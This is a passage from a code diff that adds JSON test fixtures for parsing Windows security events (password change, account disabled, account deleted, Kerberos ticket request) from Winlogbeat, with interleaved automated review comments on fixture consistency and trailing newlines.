Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's 
password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account 
Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 
756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..31cca5f97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json 
@@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount 
Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file 
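Review bot: The sample is internally inconsistent: `event_data.TargetSid` (and therefore the expected `action.properties.TargetSid`) is `S-4-5-6`, while the `Target Account: Security ID` line of `event.original` for the same event reads `S-1-2-3-4-5`. This looks like an anonymisation slip rather than a parser problem, but a fixture whose structured fields disagree with its rendered message is a weak regression test should the parser ever derive fields from the text, so I would align both to one value. The new fixtures here also end with `\ No newline at end of file`; adding the trailing newline keeps future diffs clean.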
diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..e147e2eb4 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json 
@@ -0,0 +1,84 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + }, + "expected": { + "message": 
"{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget 
Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..53d650df2 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json 
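Review bot: The expected output for this 4726 (account deleted) fixture pins `related.user` to `["doe.j"]` only, while the deleted account `smithee.a` appears under `user.target.name` but not in `related.user`; for a deletion event the target account is the value an analyst pivots on, so if the parser (outside this diff) is meant to collect both subject and target there, the fixture should expect `"user": ["doe.j", "smithee.a"]`, and if the omission is deliberate it deserves a one-line note in the PR description. The same fixture also pins `action.id` as the number `4726` while `event.code` and `winlog.event_id` carry the string `"4726"`; that looks like existing parser behaviour rather than something this change introduces, but it is worth confirming consumers expect the type split. Finally, this file and the 4768 and 4769 fixtures are committed without a trailing newline (`\ No newline at end of file`); adding one keeps future diffs on the closing brace clean.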
@@ -0,0 +1,102 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de 
l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" 
+ }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat 